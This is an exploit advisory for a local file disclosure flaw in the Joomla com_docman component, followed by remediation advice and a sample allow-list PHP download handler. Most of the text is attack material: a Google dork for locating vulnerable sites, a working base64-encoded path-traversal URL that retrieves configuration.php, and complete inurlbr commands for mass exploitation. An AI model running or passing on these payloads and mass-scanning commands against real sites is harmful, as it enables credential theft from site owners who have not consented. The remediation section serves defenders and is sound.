Exploring a component of the Joomla CMS
# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: [email protected]
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
https://www.exploit-db.com/exploits/37620/
The application's "file=" GET parameter is not sanitized, which allows arbitrary files to be downloaded from the server.
Google Dork:
inurl:"/components/com_docman/dl2.php"
POC:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=base64([LFD])
Internally, the application uses PHP's native base64_decode function to decode this parameter before accessing the file.
string base64_decode ( string $data [, bool $strict = false ] );
See http://php.net/manual/en/function.base64-decode.php
Since the application base64-decodes the parameter, the path must be base64-encoded before it is sent in order to retrieve files from the server.
injection string:
../../../../../../../target/www/configuration.php <= Not Ready
encoded string:
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !
Example
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !
Using inurlbr scanner for mass exploitation:
Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command
SET DORK:
--dork 'inurl:"/components/com_docman/dl2.php"'
SET OUTPUT FILE:
-s dl2.txt
SET EXPLOIT GET
To encode the injection string, an internal function of the inurlbr script can be used:
base64: encodes values in base64.
Example: base64({value})
Usage: base64(102030)
Usage:
--exploit-get 'user?id=base64(102030)'
URL with inject get:
http://www.target.us/user?id=MTAyMDMw
Use:
--exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'
OR USE SITE ENCODER: https://www.base64encode.org/
Use:
--exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='
SET FILTER
Filter results to unique domains.
--unique
SET VALIDATION
Validate results based on the returned HTTP status code.
Example: --ifcode {ifcode}
Usage: --ifcode 200
COMPLETE COMMAND:
php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt --exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)' --unique --ifcode 200
OR
php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt --exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==' --unique --ifcode 200
Remediation:
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible, the application can maintain a whitelist of files that may be served by the page and then use an identifier (for example an index number) to access the selected file. Any request containing an invalid identifier has to be rejected; this way there is no attack surface for malicious users to manipulate the path.
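As an added illustration of this remediation (example code, not com_docman's own handler), the following PHP download script maps an integer identifier to an allow-listed file name and refuses everything else; the DOCS_DIR location and the ALLOWED_FILES entries are assumptions for the example.

```php
<?php
// Added example, not code from the com_docman component: a download handler that
// resolves an integer identifier against an allow list instead of decoding a
// user-supplied path. DOCS_DIR and ALLOWED_FILES are hypothetical values.

const DOCS_DIR = __DIR__ . '/documents';

// Allow list: identifier => file name. Only entries listed here can ever be served.
const ALLOWED_FILES = [
    1 => 'user-guide.pdf',
    2 => 'release-notes.txt',
];

/**
 * Resolve a requested identifier to an absolute path inside DOCS_DIR,
 * or return null when the request must be rejected.
 */
function resolveDownload($rawId): ?string
{
    // Accept only a plain positive integer: no base64, no path characters.
    if (!is_string($rawId) && !is_int($rawId)) {
        return null;
    }
    if (!preg_match('/^[1-9][0-9]*$/', (string) $rawId)) {
        return null;
    }
    $id = (int) $rawId;
    if (!array_key_exists($id, ALLOWED_FILES)) {
        return null;
    }

    $base = realpath(DOCS_DIR);
    $path = realpath(DOCS_DIR . '/' . ALLOWED_FILES[$id]);
    // Defence in depth: even an allow-listed name must resolve inside the base directory.
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$path = resolveDownload($_GET['id'] ?? '');
if ($path === null) {
    http_response_code(404); // generic response: no path or PHP error text is echoed (avoids FPD)
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

With display_errors disabled in production, a failed lookup returns only a bare 404, so neither the filesystem path nor a traversal result is ever disclosed.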
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
https://www.owasp.org/index.php/Full_Path_Disclosure